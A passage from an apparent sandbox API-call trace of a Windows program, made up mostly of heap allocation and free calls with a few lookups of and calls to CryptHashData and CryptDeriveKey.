dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0226.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0226.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0226.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0226.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0226.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f58 [0226.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0226.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0226.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0226.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0226.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0226.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0226.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0226.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0226.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0226.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0226.670] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0226.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0226.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0226.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0226.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0226.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0226.671] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0226.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0226.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510d0 [0226.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0226.671] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0226.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0226.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0226.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0226.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0226.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0226.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0226.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0226.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0226.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0226.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0226.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0226.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0226.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0226.672] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0226.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0226.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51370, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0226.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0226.672] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0226.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0226.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.672] CryptHashData (hHash=0xa873d0, pbData=0x2e54fd8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0226.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0226.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.673] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0226.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0226.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0226.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51520 [0226.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0226.673] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0226.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0226.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0226.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0226.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0226.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0226.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0226.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0226.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0226.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0226.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0226.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0226.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0226.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0226.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0226.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0226.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0226.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0226.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0226.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0226.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0226.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0226.674] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0226.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0226.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51568 [0226.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0226.674] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0226.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0226.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0226.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0226.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0226.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0226.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0226.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0226.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0226.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0226.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0226.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0226.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0226.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0226.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0226.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0226.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0226.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0226.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0226.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0226.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0226.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0226.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0226.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0226.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0226.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0226.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0226.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0226.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0226.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0226.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0226.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0226.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0226.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0226.676] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0226.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0226.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0226.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0226.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0226.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0226.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0226.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0226.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0226.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0226.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0226.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0226.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0226.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0226.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0226.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0226.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0226.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0226.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0226.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0226.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0226.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0226.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0226.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0226.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0226.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0226.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0226.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0226.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0226.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0226.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0226.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0226.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0226.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0226.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0226.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0226.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0226.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0226.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0226.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0226.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0226.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0226.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0226.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0226.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0226.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0226.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0226.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0226.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0226.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0226.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0226.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0226.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0226.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0226.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0226.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0226.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0226.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0226.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51550 [0226.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51550, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0226.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0226.678] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0226.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0226.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0226.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0226.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0226.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0226.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0226.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0226.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0226.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0226.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0226.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0226.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0226.679] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa873d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87650) returned 1 [0226.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0226.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0226.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0226.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0226.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0226.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0226.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0226.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0226.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0226.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0226.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0226.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0226.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0226.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0226.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0226.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0226.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0226.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0226.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0226.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0226.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0226.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0226.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0226.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0226.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0226.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0226.680] RtlAllocateHeap 